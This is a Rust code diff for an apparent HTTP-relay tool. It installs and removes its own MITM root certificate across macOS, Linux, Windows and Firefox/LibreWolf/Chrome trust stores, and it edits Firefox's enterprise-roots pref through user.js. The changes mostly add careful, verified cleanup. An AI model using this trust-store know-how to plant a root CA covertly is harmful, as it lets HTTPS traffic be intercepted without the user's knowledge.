+/// exits non-zero for "not found", which is indistinguishable from
+/// real failures, so the final trust state is verified by the caller
+/// via `is_ca_trusted_by_name`.
+fn remove_macos() {
+    let home = std::env::var("HOME").unwrap_or_default();
+    let login_kc_db = format!("{}/Library/Keychains/login.keychain-db", home);
+    let login_kc = format!("{}/Library/Keychains/login.keychain", home);
+    let login_keychain = if Path::new(&login_kc_db).exists() {
+        login_kc_db
+    } else {
+        login_kc
+    };
+
+    let res = Command::new("security")
+        .args(["delete-certificate", "-c", CERT_NAME, &login_keychain])
+        .status();
+    if matches!(res, Ok(s) if s.success()) {
+        tracing::info!("Removed CA from login keychain.");
+    }
+
+    if macos_system_keychain_has() {
+        let res = Command::new("sudo")
+            .args([
+                "security",
+                "delete-certificate",
+                "-c",
+                CERT_NAME,
+                "/Library/Keychains/System.keychain",
+            ])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from System keychain.");
+        } else {
+            tracing::warn!(
+                "System keychain still has the CA and the sudo delete did not \
+                 succeed — re-run with an admin password available."
+            );
+        }
+    }
+}
+
+/// Probe-without-sudo: does the System keychain currently contain our
+/// cert? `security find-certificate` against the system keychain path
+/// does not require admin; only `delete-certificate` does. Used to
+/// decide whether to escalate at all.
+fn macos_system_keychain_has() -> bool {
+    let out = Command::new("security")
+        .args([
+            "find-certificate",
+            "-a",
+            "-c",
+            CERT_NAME,
+            "/Library/Keychains/System.keychain",
+        ])
+        .output();
+    match out {
+        Ok(o) => o.status.success() && !o.stdout.is_empty(),
+        Err(_) => false,
+    }
+}
+
 fn is_trusted_macos() -> bool {
     let out = Command::new("security")
         .args(["find-certificate", "-a", "-c", CERT_NAME])
@@ -142,7 +479,10 @@ fn install_linux(cert_path: &str) -> bool {
             try_copy_and_run(cert_path, &dest, &[&["update-ca-trust", "extract"]])
         }
         "arch" => {
-            let dest = format!("/etc/ca-certificates/trust-source/anchors/{}.crt", safe_name);
+            let dest = format!(
+                "/etc/ca-certificates/trust-source/anchors/{}.crt",
+                safe_name
+            );
             try_copy_and_run(cert_path, &dest, &[&["trust", "extract-compat"]])
         }
         "openwrt" => {
@@ -154,7 +494,8 @@ fn install_linux(cert_path: &str) -> bool {
                 "OpenWRT detected: the router doesn't need to trust the MITM CA. \
                  Copy {} to each LAN client (browser / OS trust store) instead. \
                  Example: scp root@<router>:{} ./ and import from there.",
-                cert_path, cert_path
+                cert_path,
+                cert_path
             );
             true
         }
@@ -253,7 +594,11 @@ fn classify_os_release(content: &str) -> String {
             Some(x) => x,
             None => continue,
         };
-        let v = v.trim().trim_matches('"').trim_matches('\'').to_ascii_lowercase();
+        let v = v
+            .trim()
+            .trim_matches('"')
+            .trim_matches('\'')
+            .to_ascii_lowercase();
         match k.trim() {
             "ID" => id = v,
             "ID_LIKE" => id_like = v,
@@ -281,13 +626,103 @@ fn classify_os_release(content: &str) -> String {
     "unknown".into()
 }
 
+/// Mirror of `install_linux`: for each known anchor dir, delete our cert
+/// file and run the corresponding refresh command. Tries without sudo
+/// first, falls back to sudo. Missing files are silently skipped —
+/// removal is idempotent.
+///
+/// Key safety behavior: we refresh the trust bundle **regardless of
+/// whether we found an anchor file to delete**. The concern is a retry
+/// after a prior run that deleted the anchor but failed to refresh —
+/// leaving the merged bundle still containing our PEM. On the next
+/// invocation the anchor dir is empty, so a "delete file, then refresh"
+/// contract would skip the refresh entirely and `remove_ca` would see
+/// no anchor file left, declare success, and delete `ca/` while the
+/// stale root is still trusted. Running the refresh unconditionally
+/// catches this.
+///
+/// Returns `false` if any refresh command failed — callers must then
+/// abort file deletion so a regenerated CA with a fresh keypair can't
+/// mismatch the stale root.
+fn remove_linux() -> bool {
+    let safe_name = CERT_NAME.replace(' ', "_");
+    let anchors: &[(&str, &[&str])] = &[
+        (
+            "/usr/local/share/ca-certificates",
+            &["update-ca-certificates"],
+        ),
+        (
+            "/etc/pki/ca-trust/source/anchors",
+            &["update-ca-trust", "extract"],
+        ),
+        (
+            "/etc/ca-certificates/trust-source/anchors",
+            &["trust", "extract-compat"],
+        ),
+    ];
+
+    let mut all_ok = true;
+    for (dir, refresh) in anchors {
+        // Skip distros whose anchor dir doesn't exist — running their
+        // refresh tool (e.g. `trust extract-compat` on a Debian host)
+        // would just error out and falsely mark the removal as failed.
+        if !Path::new(dir).exists() {
+            continue;
+        }
+
+        let path = format!("{}/{}.crt", dir, safe_name);
+        let anchor_present = Path::new(&path).exists();
+        if anchor_present {
+            let deleted =
+                std::fs::remove_file(&path).is_ok() || run_cmd(&["sudo", "rm", "-f", &path]);
+            if !deleted {
+                tracing::warn!("failed to remove {}", path);
+                all_ok = false;
+                continue;
+            }
+        }
+
+        // Always refresh — see doc comment for the retry-safety rationale.
+        let refreshed = run_cmd(refresh) || {
+            let mut full: Vec<&str> = vec!["sudo"];
+            full.extend_from_slice(refresh);
+            run_cmd(&full)
+        };
+        if !refreshed {
+            tracing::error!(
+                "refresh {:?} failed for {} — CA may still be trusted via the merged bundle",
+                refresh,
+                dir
+            );
+            all_ok = false;
+        } else if anchor_present {
+            tracing::info!("Removed CA from {} (bundle refreshed).", dir);
+        } else {
+            tracing::debug!("Refreshed {} bundle (nothing to delete here).", dir);
+        }
+    }
+    all_ok
+}
+
 fn is_trusted_linux() -> bool {
-    let anchor_dirs = [
+    // Check both the anchor dirs (what we write into on install) and
+    // the post-extract dirs (where update-ca-certificates / `trust
+    // extract-compat` etc. copy or symlink our PEM after refresh).
+    // Checking the post-extract side catches the "anchor file already
+    // removed but bundle not regenerated" case on a retry — if we only
+    // looked at anchor dirs, a `remove_ca` retry after a prior refresh
+    // failure could declare success while the merged bundle still
+    // contains our stale root.
+    let dirs = [
         "/usr/local/share/ca-certificates",
         "/etc/pki/ca-trust/source/anchors",
         "/etc/ca-certificates/trust-source/anchors",
+        // Post-extract locations:
+        "/etc/ssl/certs",
+        "/etc/pki/ca-trust/extracted/pem/directory-hash",
+        "/etc/ca-certificates/extracted/cadir",
     ];
-    for d in anchor_dirs {
+    for d in dirs {
         if let Ok(entries) = std::fs::read_dir(d) {
             for e in entries.flatten() {
                 let name = e.file_name();
@@ -310,24 +745,33 @@ fn is_trusted_linux() -> bool {
 /// false on Windows, so the Check-CA button was misleading users into
 /// reinstalling a cert that was already trusted.
 fn is_trusted_windows() -> bool {
-    // `certutil -user -store Root <name>` prints the matching cert entries
-    // on success (stdout), and exits with a non-zero code plus a "Not
-    // found" message if nothing matches. We also check stdout for the
-    // cert name because certutil in some locales returns 0 even on no-
-    // match, just with empty output.
-    for args in [
-        vec!["-user", "-store", "Root", CERT_NAME],
-        vec!["-store", "Root", CERT_NAME],
-    ] {
-        let out = Command::new("certutil").args(&args).output();
-        if let Ok(o) = out {
+    windows_store_has(true) || windows_store_has(false)
+}
+
+/// Query a single Windows Trusted Root store for our CA.
+/// `user = true` hits the current-user store (no admin needed);
+/// `user = false` hits the machine store. `certutil -store Root <name>`
+/// prints the matching cert entries on success and exits non-zero with
+/// "Not found" if nothing matches — we also check stdout for the cert
+/// name because certutil in some locales returns 0 on no-match with
+/// empty output.
+fn windows_store_has(user: bool) -> bool {
+    let mut args: Vec<&str> = Vec::new();
+    if user {
+        args.push("-user");
+    }
+    args.extend(["-store", "Root", CERT_NAME]);
+    let out = Command::new("certutil").args(&args).output();
+    match out {
+        Ok(o) => {
             let stdout = String::from_utf8_lossy(&o.stdout);
-            if o.status.success() && stdout.to_ascii_lowercase().contains(&CERT_NAME.to_ascii_lowercase()) {
-                return true;
-            }
+            o.status.success()
+                && stdout
+                    .to_ascii_lowercase()
+                    .contains(&CERT_NAME.to_ascii_lowercase())
         }
+        Err(_) => false,
     }
-    false
 }
 
 fn install_windows(cert_path: &str) -> bool {
@@ -355,10 +799,51 @@ fn install_windows(cert_path: &str) -> bool {
     false
 }
 
-// ---------- NSS (Firefox + Chrome/Chromium on Linux) ----------
+/// Delete from user and/or machine Trusted Root stores. We probe each
+/// store first with `certutil -store` and only attempt the delete where
+/// the cert actually lives — this avoids the confusing "needs elevation"
+/// error that `-delstore Root` would print when the cert was only ever
+/// installed in the per-user store (the default path for non-admin
+/// runs). Final state is verified by the caller via `is_ca_trusted`.
+fn remove_windows() {
+    let mut any = false;
+
+    if windows_store_has(true) {
+        let res = Command::new("certutil")
+            .args(["-delstore", "-user", "Root", CERT_NAME])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from Windows user Trusted Root store.");
+            any = true;
+        } else {
+            tracing::warn!("failed to remove CA from Windows user Trusted Root store");
+        }
+    }
+
+    if windows_store_has(false) {
+        let res = Command::new("certutil")
+            .args(["-delstore", "Root", CERT_NAME])
+            .status();
+        if matches!(res, Ok(s) if s.success()) {
+            tracing::info!("Removed CA from Windows machine Trusted Root store.");
+            any = true;
+        } else {
+            tracing::warn!(
+                "failed to remove CA from Windows machine Trusted Root store \
+                 (run as administrator to complete)"
+            );
+        }
+    }
+
+    if !any {
+        tracing::info!("No MITM CA found in Windows Trusted Root stores.");
+    }
+}
+
+// ---------- NSS (Firefox + LibreWolf + Chrome/Chromium on Linux) ----------
 
 /// Best-effort install of the CA into all discovered NSS stores:
-///   1. Every Firefox profile (each has its own cert9.db).
+///   1. Every Firefox/LibreWolf profile (each has its own cert9.db).
 ///   2. On Linux, the shared Chrome/Chromium NSS DB at ~/.pki/nssdb —
 ///      this is the one update-ca-certificates does NOT populate, and
 ///      missing it was the real blocker for Chrome users who'd installed
@@ -366,18 +851,19 @@ fn install_windows(cert_path: &str) -> bool {
 /// Silently no-ops if `certutil` (from libnss3-tools) isn't on PATH.
 /// Browsers must be closed during install for changes to take effect.
 fn install_nss_stores(cert_path: &str) {
-    // First, try to make Firefox pick up the OS-level CA automatically by
-    // flipping the `security.enterprise_roots.enabled` pref in user.js of
-    // every Firefox profile we find. This is the cleanest cross-platform
-    // fix because it doesn't depend on whether NSS certutil is installed
-    // — Firefox just starts trusting whatever the OS trusts. Especially
-    // important on Windows where NSS certutil isn't on PATH.
-    enable_firefox_enterprise_roots();
+    // First, try to make Firefox/LibreWolf pick up the OS-level CA
+    // automatically by flipping the `security.enterprise_roots.enabled`
+    // pref in user.js of every Mozilla-family profile we find. This is
+    // the cleanest cross-platform fix because it doesn't depend on
+    // whether NSS certutil is installed — the browser just starts
+    // trusting whatever the OS trusts. Especially important on Windows
+    // where NSS certutil isn't on PATH.
+    enable_mozilla_enterprise_roots();
 
     if !has_nss_certutil() {
         tracing::debug!(
-            "NSS certutil not found — Firefox will still trust the CA via the \
-             `security.enterprise_roots.enabled` user.js pref (flipped above). \
+            "NSS certutil not found — Firefox/LibreWolf will still trust the CA via \
+             the `security.enterprise_roots.enabled` user.js pref (flipped above). \
              For Chrome/Chromium on Linux, install `libnss3-tools` (Debian/Ubuntu) \
              or `nss-tools` (Fedora/RHEL), or import ca.crt manually via \
              chrome://settings/certificates → Authorities."
@@ -388,8 +874,8 @@ fn install_nss_stores(cert_path: &str) {
     let mut ok = 0;
     let mut tried = 0;
 
-    // 1. Firefox profiles.
-    for p in firefox_profile_dirs() {
+    // 1. Firefox/LibreWolf profiles.
+    for p in mozilla_family_profile_dirs() {
         tried += 1;
         if install_nss_in_profile(&p, cert_path) {
             ok += 1;
@@ -425,77 +911,184 @@ fn install_nss_stores(cert_path: &str) {
         tracing::info!("CA installed in {}/{} NSS store(s).", ok, tried);
     } else if tried > 0 {
         tracing::warn!(
-            "NSS install: 0/{} stores updated. If Firefox/Chrome was running, close \
-             them and retry. Otherwise, import ca.crt manually via browser settings.",
+            "NSS install: 0/{} stores updated. If Firefox/LibreWolf/Chrome was running, \
+             close them and retry. Otherwise, import ca.crt manually via browser settings.",
             tried
         );
     }
 }
 
 /// Write `user_pref("security.enterprise_roots.enabled", true);` to every
-/// discovered Firefox profile's user.js. This makes Firefox trust the OS
-/// trust store on next startup — so our already-successful system-level
-/// CA install automatically propagates. Critical on Windows where Firefox
-/// keeps its own NSS DB independent of Windows cert store, and NSS
-/// certutil isn't typically installed so the certutil-based path doesn't
-/// fire there.
+/// discovered Firefox/LibreWolf profile's user.js. This makes the browser
+/// trust the OS trust store on next startup — so our already-successful
+/// system-level CA install automatically propagates. Critical on Windows
+/// where the browser keeps its own NSS DB independent of the Windows
+/// cert store, and NSS certutil isn't typically installed so the
+/// certutil-based path doesn't fire there.
 ///
-/// Existing user.js entries for other prefs are preserved by appending
-/// rather than truncating. Idempotent.
-fn enable_firefox_enterprise_roots() {
-    const PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#;
+/// We tag the block we write with a sentinel marker comment on the line
+/// above the pref, so uninstall can prove ownership before removing it —
+/// the user may have had `security.enterprise_roots.enabled = true`
+/// before this app existed, and we must not silently revoke their
+/// setting. Idempotent.
+fn enable_mozilla_enterprise_roots() {
     let mut touched = 0;
-    for profile in firefox_profile_dirs() {
+    for profile in mozilla_family_profile_dirs() {
         let user_js = profile.join("user.js");
         let existing = std::fs::read_to_string(&user_js).unwrap_or_default();
-        if existing.contains("security.enterprise_roots.enabled") {
-            // Already set by us or the user. Replace-or-keep: if they set it
-            // to false we leave their choice alone. If it's already our line
-            // verbatim, nothing to do.
-            if existing.contains(PREF) {
-                continue;
+        match add_enterprise_roots_block(&existing) {
+            EnterpriseRootsEdit::AddedBlock(new) => {
+                if let Err(e) = std::fs::write(&user_js, new) {
+                    tracing::debug!(
+                        "mozilla profile {}: user.js write failed: {}",
+                        profile.display(),
+                        e
+                    );
+                    continue;
+                }
+                touched += 1;
+            }
+            EnterpriseRootsEdit::AlreadyOurs => {}
+            EnterpriseRootsEdit::UserOwned => {
+                tracing::debug!(
+                    "mozilla profile {} already has a user-owned enterprise_roots pref; leaving alone",
+                    profile.display()
+                );
             }
-            // Different value present — don't overwrite.
-            tracing::debug!(
-                "firefox profile {} already has a different enterprise_roots pref; leaving alone",
-                profile.display()
-            );
-            continue;
-        }
-        let mut out = existing;
-        if !out.is_empty() && !out.ends_with('\n') {
-            out.push('\n');
-        }
-        out.push_str(PREF);
-        out.push('\n');
-        if let Err(e) = std::fs::write(&user_js, out) {
-            tracing::debug!(
-                "firefox profile {}: user.js write failed: {}",
-                profile.display(),
-                e
-            );
-            continue;
         }
-        touched += 1;
     }
     if touched > 0 {
         tracing::info!(
-            "enabled Firefox enterprise_roots in {} profile(s) — restart Firefox for it to take effect",
+            "enabled enterprise_roots in {} Firefox/LibreWolf profile(s) — restart the browser for it to take effect",
             touched
         );
     }
 }
 
+// ── Firefox enterprise_roots marker-block helpers (pure, testable) ──
+//
+// We write a two-line block into user.js — a sentinel comment followed
+// by the pref itself. The marker proves we wrote it, so uninstall can
+// distinguish our own line from a user-authored one with the same
+// value. Any user-authored `security.enterprise_roots.enabled` line
+// (with or without our marker above it) means "hands off".
+const FX_MARKER: &str = "// mhrv-rs: auto-added, safe to strip with --remove-cert";
+const FX_PREF: &str = r#"user_pref("security.enterprise_roots.enabled", true);"#;
+
+#[derive(Debug, PartialEq, Eq)]
+enum EnterpriseRootsEdit {
+    AddedBlock(String),
+    AlreadyOurs,
+    UserOwned,
+}
+
+/// Append our marker+pref block to `existing` unless (a) it's already
+/// there verbatim (idempotent no-op), or (b) the user has their own
+/// `enterprise_roots` pref that we didn't write — in which case we
+/// leave everything alone.
+fn add_enterprise_roots_block(existing: &str) -> EnterpriseRootsEdit {
+    if contains_our_block(existing) {
+        return EnterpriseRootsEdit::AlreadyOurs;
+    }
+    if existing.contains("security.enterprise_roots.enabled") {
+        return EnterpriseRootsEdit::UserOwned;
+    }
+    let mut out = existing.to_string();
+    if !out.is_empty() && !out.ends_with('\n') {
+        out.push('\n');
+    }
+    out.push_str(FX_MARKER);
+    out.push('\n');
+    out.push_str(FX_PREF);
+    out.push('\n');
+    EnterpriseRootsEdit::AddedBlock(out)
+}
+
+/// Strip our marker+pref block from `existing` if present. If the pref
+/// exists without our marker directly above it, the user owns it — we
+/// cannot prove otherwise and leave user.js untouched.
+///
+/// Consequence for upgrades from pre-marker versions of this app: the
+/// legacy bare pref line stays orphaned in user.js after uninstall.
+/// That's cosmetic only (Firefox falls back to its built-in root store
+/// the moment the CA leaves the OS trust store), and it's the
+/// conservative tradeoff — a bare `enterprise_roots = true` line is
+/// indistinguishable from a user- or enterprise-policy-authored one,
+/// and silently revoking that would break unrelated Firefox trust
+/// behavior. README documents the orphan.
+fn strip_enterprise_roots_block(existing: &str) -> Option<String> {
+    if !contains_our_block(existing) {
+        return None;
+    }
+    let lines: Vec<&str> = existing.lines().collect();
+    let mut out: Vec<&str> = Vec::with_capacity(lines.len());
+    let mut i = 0;
+    while i < lines.len() {
+        let is_marker = lines[i].trim() == FX_MARKER;
+        let next_is_our_pref = lines.get(i + 1).map_or(false, |l| l.trim() == FX_PREF);
+        if is_marker && next_is_our_pref {
+            i += 2;
+            continue;
+        }
+        out.push(lines[i]);
+        i += 1;
+    }
+    let mut joined = out.join("\n");
+    if existing.ends_with('\n') && !joined.is_empty() {
+        joined.push('\n');
+    }
+    Some(joined)
+}
+
+/// True iff `existing` contains our sentinel directly above our pref.
+fn contains_our_block(existing: &str) -> bool {
+    let mut prev: Option<&str> = None;
+    for line in existing.lines() {
+        if prev.map(|p| p.trim()) == Some(FX_MARKER) && line.trim() == FX_PREF {
+            return true;
+        }
+        prev = Some(line);
+    }
+    false
+}
+
+/// True iff `existing` has our exact pref line but NOT inside our
+/// marker+pref block — i.e. an orphan `security.enterprise_roots.enabled
+/// = true` whose provenance we can't prove. Used by
+/// `disable_mozilla_enterprise_roots` to surface a one-line hint on
+/// uninstall so users upgrading from pre-v1.2.13 installs know their
+/// Firefox user.js still has a cosmetic orphan pref from the old app
+/// (not broken, just left in place because we can't distinguish it
+/// from a user-authored line).
+fn has_bare_enterprise_roots(existing: &str) -> bool {
+    if contains_our_block(existing) {
+        return false;
+    }
+    existing.lines().any(|l| l.trim() == FX_PREF)
+}
+
 fn has_nss_certutil() -> bool {
+    // We want NSS's `certutil` (from libnss3-tools), not Windows's
+    // built-in `certutil.exe` which shares the binary name but has
+    // completely different semantics. The previous heuristic looked
+    // for "-d" in help output, which false-positived on Windows
+    // because `-dump` / `-dumpPFX` are in the Windows help text.
+    //
+    // "nickname" is an NSS-specific concept (single-letter batch verbs
+    // like `-A`/`-D`/`-n nickname`); the Windows and macOS built-in
+    // certutils don't use that term. Matching on it reliably
+    // discriminates.
     Command::new("certutil")
         .arg("--help")
         .output()
         .ok()
         .map(|o| {
-            // macOS has a different certutil built-in that doesn't support -d.
-            // NSS-specific help output mentions the -d / -n flags.
-            String::from_utf8_lossy(&o.stderr).contains("-d")
-                || String::from_utf8_lossy(&o.stdout).contains("-d")
+            let combined = format!(
+                "{}{}",
+                String::from_utf8_lossy(&o.stderr),
+                String::from_utf8_lossy(&o.stdout)
+            );
+            combined.to_ascii_lowercase().contains("nickname")
         })
         .unwrap_or(false)
 }
@@ -516,15 +1109,7 @@ fn install_nss_in_dir(dir_arg: &str, cert_path: &str) -> bool {
 
     let res = Command::new("certutil")
         .args([
-            "-A",
-            "-n",
-            CERT_NAME,
-            "-t",
-            "C,,",
-            "-d",
-            dir_arg,
-            "-i",
-            cert_path,
+            "-A", "-n", CERT_NAME, "-t", "C,,", "-d", dir_arg, "-i", cert_path,
         ])
         .output();
     match res {
@@ -559,16 +1144,273 @@ fn install_nss_in_profile(profile: &Path, cert_path: &str) -> bool {
     install_nss_in_dir(&dir_arg, cert_path)
 }
 
-fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
-    use std::path::PathBuf;
+/// Best-effort reverse of `install_nss_stores`: delete our cert from
+/// every Firefox profile NSS DB we can find, plus the shared Chrome/
+/// Chromium NSS DB on Linux, and remove the user.js pref we added.
+///
+/// NSS cleanup is explicitly best-effort — `certutil` from libnss3-tools
+/// may be missing, a DB may be locked by a running Firefox/Chrome, or
+/// the delete may fail for reasons we can't distinguish. When that
+/// happens we log a manual-cleanup hint but don't fail the whole
+/// revocation. Callers of `remove_ca` should convey this to users so
+/// the `--remove-cert` promise is "OS trust store + best-effort NSS",
+/// not "guaranteed NSS".
+/// Outcome of an NSS cleanup pass. `tried` / `ok` let callers render
+/// accurate messages like "NSS cleanup partial: 1/3 stores updated".
+/// `tool_missing_with_stores_present` flags the case where we found
+/// Firefox/Chrome NSS DBs but NSS `certutil` isn't on PATH — surfaced
+/// so the UI/CLI can tell the user why the cleanup is incomplete.
+#[derive(Debug, Clone, Copy, Default)]
+pub struct NssReport {
+    pub tried: usize,
+    pub ok: usize,
+    pub tool_missing_with_stores_present: bool,
+}
+
+impl NssReport {
+    pub fn is_clean(&self) -> bool {
+        !self.tool_missing_with_stores_present && self.tried == self.ok
+    }
+}
+
+fn remove_nss_stores() -> NssReport {
+    disable_mozilla_enterprise_roots();
+
+    if !has_nss_certutil() {
+        // Only warn if there's actually an NSS store we can see — if the
+        // user never ran Firefox/Chrome on this machine there's nothing
+        // to clean up either way.
+        let profiles = mozilla_family_profile_dirs();
+        let chrome_present: bool;
+        #[cfg(target_os = "linux")]
+        {
+            chrome_present = chrome_nssdb_path()
+                .map(|p| p.join("cert9.db").exists() || p.join("cert8.db").exists())
+                .unwrap_or(false);
+        }
+        #[cfg(not(target_os = "linux"))]
+        {
+            chrome_present = false;
+        }
+        let stores_present = !profiles.is_empty() || chrome_present;
+        if stores_present {
+            tracing::warn!(
+                "NSS certutil not found — cannot automatically remove CA from \
+                 Firefox/LibreWolf/Chrome NSS stores. Remove `MasterHttpRelayVPN` \
+                 manually via each browser's certificate settings, or install NSS \
+                 tools (`libnss3-tools` on Debian/Ubuntu, `nss-tools` on Fedora/RHEL) \
+                 and re-run --remove-cert."
+            );
+        }
+        return NssReport {
+            tried: 0,
+            ok: 0,
+            tool_missing_with_stores_present: stores_present,
+        };
+    }
+
+    let mut report = NssReport::default();
+
+    for p in mozilla_family_profile_dirs() {
+        report.tried += 1;
+        if remove_nss_in_profile(&p) {
+            report.ok += 1;
+        }
+    }
+
+    #[cfg(target_os = "linux")]
+    {
+        if let Some(nssdb) = chrome_nssdb_path() {
+            if nssdb.join("cert9.db").exists() || nssdb.join("cert8.db").exists() {
+                report.tried += 1;
+                let dir_arg = format!("sql:{}", nssdb.display());
+                if remove_nss_in_dir(&dir_arg) {
+                    report.ok += 1;
+                    tracing::info!(
+                        "Removed CA from Chrome/Chromium NSS DB: {}",
+                        nssdb.display()
+                    );
+                }
+            }
+        }
+    }
+
+    if report.tried > 0 {
+        if report.ok == report.tried {
+            tracing::info!("Removed CA from {} NSS store(s).", report.ok);
+        } else {
+            tracing::warn!(
+                "NSS cleanup partial: {}/{} stores updated. If Firefox/LibreWolf/Chrome \
+                 was running, close it and re-run --remove-cert. Otherwise \
+                 remove `MasterHttpRelayVPN` manually via each browser's cert \
+                 settings.",
+                report.ok,
+                report.tried
+            );
+        }
+    }
+    report
+}
+
+/// Best-effort remove our cert from one NSS DB.
+///
+/// Idempotent contract: "cert was never in this DB" is success.
+/// Critical distinction from probe *failure*: if `certutil -L` fails
+/// because the DB is locked by a running Firefox/Chrome, corrupt, or
+/// inaccessible, we must NOT return `true` — that would silently mask
+/// an incomplete revocation the user can't see, and NSS would keep
+/// trusting the stale root. We parse stderr: only the specific
+/// "could not find cert" message means absent.
+fn remove_nss_in_dir(dir_arg: &str) -> bool {
+    let list = Command::new("certutil")
+        .args(["-L", "-n", CERT_NAME, "-d", dir_arg])
+        .output();
+    match list {
+        Ok(o) if o.status.success() => {
+            // Cert is present — fall through to delete.
+        }
+        Ok(o) => {
+            let stderr = String::from_utf8_lossy(&o.stderr);
+            if is_nss_not_found(&stderr) {
+                tracing::debug!("NSS {}: no `{}` entry — already clean", dir_arg, CERT_NAME);
+                return true;
+            }
+            tracing::warn!(
+                "NSS {}: probe failed (DB locked / inaccessible / other error): {}",
+                dir_arg,
+                stderr.trim()
+            );
+            return false;
+        }
+        Err(e) => {
+            tracing::warn!("NSS {}: probe exec failed: {}", dir_arg, e);
+            return false;
+        }
+    }
+
+    let res = Command::new("certutil")
+        .args(["-D", "-n", CERT_NAME, "-d", dir_arg])
+        .output();
+    match res {
+        Ok(o) if o.status.success() => true,
+        Ok(o) => {
+            tracing::warn!(
+                "NSS {}: delete failed: {}",
+                dir_arg,
+                String::from_utf8_lossy(&o.stderr).trim()
+            );
+            false
+        }
+        Err(e) => {
+            tracing::warn!("NSS {}: delete exec failed: {}", dir_arg, e);
+            false
+        }
+    }
+}
+
+/// Classify NSS `certutil` stderr as "nickname not present" (idempotent
+/// success signal) vs any other failure mode (DB locked, DB corrupt,
+/// permission, etc.). Exposed for unit testing. Matches only the
+/// specific not-found messages NSS emits — anything else is treated as
+/// a real failure so silent bugs can't hide behind false positives.
+fn is_nss_not_found(stderr: &str) -> bool {
+    let s = stderr.to_ascii_lowercase();
+    s.contains("could not find cert") || s.contains("could not find a certificate")
+}
+
+fn remove_nss_in_profile(profile: &Path) -> bool {
+    let prefix = if profile.join("cert9.db").exists() {
+        "sql:"
+    } else if profile.join("cert8.db").exists() {
+        ""
+    } else {
+        return false;
+    };
+    let dir_arg = format!("{}{}", prefix, profile.display());
+    remove_nss_in_dir(&dir_arg)
+}
+
+/// Undo `enable_mozilla_enterprise_roots`: for each profile, strip the
+/// marker+pref block if (and only if) we wrote it. If the user owns
+/// their own `enterprise_roots` pref — indicated by the absence of our
+/// marker line — leave user.js alone entirely.
+fn disable_mozilla_enterprise_roots() {
+    for profile in mozilla_family_profile_dirs() {
+        let user_js = profile.join("user.js");
+        let Ok(existing) = std::fs::read_to_string(&user_js) else {
+            continue;
+        };
+        if let Some(new) = strip_enterprise_roots_block(&existing) {
+            let _ = std::fs::write(&user_js, new);
+            continue;
+        }
+        // No marker block to strip, but an orphan pref is present.
+        // Surface it so the user isn't left wondering why user.js
+        // still has an enterprise_roots line after --remove-cert.
+        // The orphan is harmless (Firefox falls back to its built-in
+        // root store once the CA leaves the OS store), but silent
+        // leftovers feel like half-done removals.
+        if has_bare_enterprise_roots(&existing) {
+            tracing::info!(
+                "Mozilla profile {}: `security.enterprise_roots.enabled` pref \
+                 present without our marker — left in place. If it was written \
+                 by a pre-v1.2.13 install it's a cosmetic orphan (harmless, the \
+                 browser falls back to its built-in root store); remove it \
+                 manually from user.js if it bothers you. If you set it \
+                 yourself, leave it.",
+                profile.display()
+            );
+        }
+    }
+}
+
+/// Candidate root directories under which Mozilla-family browser profile
+/// directories (each containing cert9.db / cert8.db) live. Pure helper —
+/// OS / HOME / APPDATA / XDG_CONFIG_HOME come in as args so the
+/// per-platform layout can be asserted in unit tests without touching
+/// env or the filesystem.
+///
+/// LibreWolf (issue #1145) is a Firefox fork with strict privacy
+/// defaults that shares Firefox's NSS DB layout and respects the same
+/// `security.enterprise_roots.enabled` pref, but stores its profile tree
+/// under its own app dir — so the original Firefox-only scan missed it
+/// and the MITM CA never reached LibreWolf's trust store. HSTS-protected
+/// sites (bing.com, youtube.com, …) then failed with
+/// MOZILLA_PKIX_ERROR_MITM_DETECTED with no add-exception path the user
+/// could take.
+///
+/// On Linux we have to scan five candidate Mozilla-fork layouts:
+///   * `~/.librewolf` — LibreWolf legacy Firefox-style layout (still
+///     present on pre-migration installs).
+///   * `${XDG_CONFIG_HOME:-~/.config}/librewolf/librewolf` — LibreWolf
+///     current XDG layout.
+///   * Both LibreWolf paths again under
+///     `~/.var/app/io.gitlab.librewolf-community/` for the Flatpak
+///     sandbox, which redirects HOME inside the container.
+///   * `~/.mozilla/icecat` — GNU IceCat (Firefox fork shipped by
+///     Trisquel / Parabola / Guix / Debian). Same NSS DB format and
+///     `security.enterprise_roots.enabled` semantics as Firefox; only
+///     the binary's branded profile dir differs. Windows/macOS builds
+///     are not officially distributed, so we don't list paths there.
+/// Non-existent roots silently no-op via `read_dir` failure, so listing
+/// all of them costs nothing on installs that only have one.
+fn mozilla_family_profile_roots(
+    os: &str,
+    home: &str,
+    appdata: Option<&str>,
+    xdg_config_home: Option<&str>,
+) -> Vec<PathBuf> {
     let mut roots: Vec<PathBuf> = Vec::new();
-    let home = std::env::var("HOME").unwrap_or_default();
-    match std::env::consts::OS {
+    match os {
         "macos" => {
             roots.push(PathBuf::from(format!(
                 "{}/Library/Application Support/Firefox/Profiles",
                 home
             )));
+            roots.push(PathBuf::from(format!(
+                "{}/Library/Application Support/LibreWolf/Profiles",
+                home
+            )));
         }
         "linux" => {
             roots.push(PathBuf::from(format!("{}/.mozilla/firefox", home)));
@@ -576,17 +1418,52 @@ fn firefox_profile_dirs() -> Vec<std::path::PathBuf> {
                 "{}/snap/firefox/common/.mozilla/firefox",
                 home
             )));
+            // Legacy LibreWolf layout (still present on older installs).
+            roots.push(PathBuf::from(format!("{}/.librewolf", home)));
+            // Current XDG layout. Empty XDG_CONFIG_HOME is treated as
+            // unset per XDG Base Directory spec.
+            let xdg = xdg_config_home
+                .filter(|v| !v.is_empty())
+                .map(String::from)
+                .unwrap_or_else(|| format!("{}/.config", home));
+            roots.push(PathBuf::from(format!("{}/librewolf/librewolf", xdg)));
+            // Flatpak sandbox: $HOME inside the container is
+            // ~/.var/app/<flatpak-id>/. Cover both legacy and XDG layouts
+            // since LibreWolf's migration mirrors the host inside the
+            // sandbox.
+            let flatpak_home = format!("{}/.var/app/io.gitlab.librewolf-community", home);
+            roots.push(PathBuf::from(format!("{}/.librewolf", flatpak_home)));
+            roots.push(PathBuf::from(format!(
+                "{}/.config/librewolf/librewolf",
+                flatpak_home
+            )));
+            // GNU IceCat: Firefox fork shipped by Trisquel / Parabola /
+            // Guix / Debian, primarily a GNU/Linux distribution target.
+            // Mirrors Firefox's `~/.mozilla/firefox` layout under
+            // `~/.mozilla/icecat`.
+            roots.push(PathBuf::from(format!("{}/.mozilla/icecat", home)));
